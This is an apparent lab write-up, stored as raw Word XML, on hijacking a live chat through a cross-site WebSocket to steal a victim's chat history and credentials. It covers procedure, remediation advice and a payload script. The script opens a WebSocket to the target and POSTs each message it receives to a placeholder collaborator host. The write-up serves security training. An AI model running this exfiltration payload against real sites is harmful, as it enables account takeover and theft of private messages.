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788E" w14:textId="12246F3D" w:rsidR="00320924" w:rsidRDefault="005F0A55" w:rsidP="008E1F5A">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t>SCENARIO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61614FDF" w14:textId="552E6A8C" w:rsidR="008E1F5A" w:rsidRDefault="008E1F5A" w:rsidP="00381A61">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>The application has an aggressive but flawed XSS filter in the live chat functionalit</w:t>
      </w:r>
      <w:r w:rsidR="00110BED">
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. We will try to exploit the vulnerability to </w:t>
      </w:r>
      <w:r w:rsidR="00B53507" w:rsidRPr="00B53507">
        <w:t>exfiltrate the victim's chat history, then use this gain access to their account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BBCDEB" w14:textId="77777777" w:rsidR="00381A61" w:rsidRDefault="00381A61" w:rsidP="008E1F5A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A91A446" w14:textId="529D1FDF" w:rsidR="00381A61" w:rsidRDefault="00381A61" w:rsidP="00381A61">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>PROCEDURE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594E711B" w14:textId="335AF742" w:rsidR="00381A61" w:rsidRDefault="00381A61" w:rsidP="00381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live chat option</w:t>
      </w:r>
      <w:r w:rsidR="00DB416F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> and send a chat message then reload the page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B74B3A1" w14:textId="77777777" w:rsidR="00DB416F" w:rsidRDefault="00381A61" w:rsidP="00DB4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Start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Interceptor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EFD3BA" w14:textId="4B91CCDC" w:rsidR="00DB416F" w:rsidRDefault="00DB416F" w:rsidP="00A25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416F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>In Burp Proxy, in the HTTP history tab, find the WebSocket handshake request. Observe that the request has no CSRF tokens</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>, so Copy the URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB416F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CFC224" w14:textId="21A416CE" w:rsidR="00A2548C" w:rsidRDefault="00A2548C" w:rsidP="00A25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exploit server and paste the Payload 1 into the body of the exploit</w:t>
      </w:r>
      <w:r w:rsidR="00A45B70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576B17D5" w14:textId="4AA06F3A" w:rsidR="0047449B" w:rsidRDefault="0047449B" w:rsidP="00A25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Click the View Exploit button and then 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Collaborator Client and click on Poll Now</w:t>
      </w:r>
      <w:r w:rsidR="005C7676">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>, we notice that we get a lot of requests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0444D86" w14:textId="7A669C15" w:rsidR="0064687A" w:rsidRDefault="00092A78" w:rsidP="00DF6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closely observe only the HTTP requests and leave rest of them</w:t>
      </w:r>
      <w:r w:rsidR="000F7D4E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> to look for the username and password of the </w:t>
      </w:r>
      <w:r w:rsidR="00027270">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">target </w:t>
      </w:r>
      <w:r w:rsidR="000F7D4E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>account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141271F" w14:textId="722DF67C" w:rsidR="00057B6C" w:rsidRPr="008F6763" w:rsidRDefault="0064687A" w:rsidP="00057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</w:t>
      </w:r>
      <w:r w:rsidR="00DF6C74">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>log in with the credentials in order to solve the lab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45110808" w14:textId="77777777" w:rsidR="008F6763" w:rsidRDefault="008F6763" w:rsidP="00057B6C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="257C848B" w14:textId="6855F7D1" w:rsidR="00057B6C" w:rsidRDefault="00057B6C" w:rsidP="00057B6C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>PAYLOAD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C1F5F2" w14:textId="08169DD7" w:rsidR="00A45B70" w:rsidRPr="00A45B70" w:rsidRDefault="00A45B70" w:rsidP="00A45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>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360507FA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var 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ws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 xml:space="preserve"> = new WebSocket('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wss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://your-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websocket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');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0FCB19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45B70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>ws.onopen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A45B70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> = function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEF70A6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45B70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>ws.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A45B70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>("READY");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC15FCD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3B8530F6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45B70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>ws.onmessage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A45B70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> = function(event) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB42002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45B70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>fetch(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A45B70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>'https://your-collaborator-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', {method: 'POST', mode: 'no-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cors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 xml:space="preserve">', body: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A45B70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>event.data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A45B70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3CFA57" w14:textId="77777777" w:rsidR="00A45B70" w:rsidRPr="00A45B70" w:rsidRDefault="00A45B70" w:rsidP="00A45B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4C15D478" w14:textId="7C84EE42" w:rsidR="00DA28BF" w:rsidRPr="00DA28BF" w:rsidRDefault="00A45B70" w:rsidP="00DA28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45B70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F235A1" w14:textId="77777777" w:rsidR="00DA28BF" w:rsidRDefault="00DA28B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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="36312455" w14:textId="42E42FEC" w:rsidR="00A45B70" w:rsidRDefault="00DA28BF" w:rsidP="00057B6C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA28BF">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6CE0A5E8" wp14:editId="470F4960">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>541020</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5286375" cy="4595495"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="104712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22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PROOF OF CONCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2218AB15" w14:textId="13D814CA" w:rsidR="00DA28BF" w:rsidRDefault="00C310ED" w:rsidP="00DA28BF">
      <w:r w:rsidRPr="00C310ED">
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="63A23477" wp14:editId="60C3A414">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>5005705</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6645910" cy="1016000"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="113834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46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C7811" w14:textId="753D94DF" w:rsidR="00DA28BF" w:rsidRPr="00DA28BF" w:rsidRDefault="00DA28BF" w:rsidP="00DA28BF"/>
    <w:p w14:paraId="4A7B0994" w14:textId="7DC3280B" w:rsidR="001607D8" w:rsidRDefault="00057B6C" w:rsidP="001607D8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>REMEDIATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0EA9BB" w14:textId="573F5BEE" w:rsidR="00115F2E" w:rsidRPr="00115F2E" w:rsidRDefault="00115F2E" w:rsidP="00115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6995">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Input Validation and Encoding:</w:t>
      </w:r>
      <w:r w:rsidRPr="00115F2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Implement stringent input validation and encoding for all data exchanged via the live chat function. Sanitize all inputs to prevent any malicious scripts from being executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185D1486" w14:textId="42AB059B" w:rsidR="00115F2E" w:rsidRPr="00115F2E" w:rsidRDefault="00115F2E" w:rsidP="00115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6995">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Token Authentication:</w:t>
      </w:r>
      <w:r w:rsidRPr="00115F2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Add token authentication to WebSocket handshake requests to prevent CSRF attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E90BDB" w14:textId="77777777" w:rsidR="00115F2E" w:rsidRPr="00115F2E" w:rsidRDefault="00115F2E" w:rsidP="00115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6995">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Validate Origin Header:</w:t>
      </w:r>
      <w:r w:rsidRPr="00115F2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ensure that the Origin header in the WebSocket handshake matches expected values. This can help prevent unauthorized cross-site WebSocket connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A08A6A" w14:textId="77777777" w:rsidR="00115F2E" w:rsidRPr="00115F2E" w:rsidRDefault="00115F2E" w:rsidP="00115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6995">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Session Management:</w:t>
      </w:r>
      <w:r w:rsidRPr="00115F2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use secure WebSocket session management practices. When a session is terminated, ensure that it cannot be reused.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEAB789" w14:textId="77777777" w:rsidR="00115F2E" w:rsidRPr="00115F2E" w:rsidRDefault="00115F2E" w:rsidP="00115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6995">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Logging and Monitoring:</w:t>
      </w:r>
      <w:r w:rsidRPr="00115F2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Monitor WebSocket connections and interactions for suspicious patterns. If any malicious activity is detected, log it, and alert administrators.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F3837B" w14:textId="404C8D9B" w:rsidR="001607D8" w:rsidRPr="00E56995" w:rsidRDefault="00115F2E" w:rsidP="00E56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56995">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Implement WAF:</w:t>
      </w:r>
      <w:r w:rsidRPr="00115F2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use a Web Application Firewall (WAF) to inspect WebSocket traffic. Although traditional WAFs are primarily designed for HTTP traffic, many modern WAFs support WebSocket inspection.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="001607D8" w:rsidRPr="00E56995" w:rsidSect="005F0A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2581"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D312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B76"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FF088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A26D6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D6506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642180">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="250821632">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="313140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96"/>
    <w:rsid w:val="00027270"/>
    <w:rsid w:val="00057B6C"/>
    <w:rsid w:val="00092A78"/>
    <w:rsid w:val="000F7D4E"/>
    <w:rsid w:val="00110BED"/>
    <w:rsid w:val="00115F2E"/>
    <w:rsid w:val="001607D8"/>
    <w:rsid w:val="002B2FA4"/>
    <w:rsid w:val="00320924"/>
    <w:rsid w:val="00381A61"/>
    <w:rsid w:val="0047449B"/>
    <w:rsid w:val="005017DD"/>
    <w:rsid w:val="00563225"/>
    <w:rsid w:val="005C7676"/>
    <w:rsid w:val="005F0A55"/>
    <w:rsid w:val="0064687A"/>
    <w:rsid w:val="008E1F5A"/>
    <w:rsid w:val="008F6763"/>
    <w:rsid w:val="00A03B96"/>
    <w:rsid w:val="00A2548C"/>
    <w:rsid w:val="00A45B70"/>
    <w:rsid w:val="00B44B99"/>
    <w:rsid w:val="00B53507"/>
    <w:rsid w:val="00C310ED"/>
    <w:rsid w:val="00DA28BF"/>
    <w:rsid w:val="00DB416F"/>
    <w:rsid w:val="00DF6C74"/>
    <w:rsid w:val="00E56995"/>
    <w:rsid w:val="00E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82AA"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{55399DF4-BAF1-4B78-926B-2B334BFD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A61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F5A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E1F5A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381A61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81A61"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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81A61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38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22</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-21T06:33:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-09T09:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>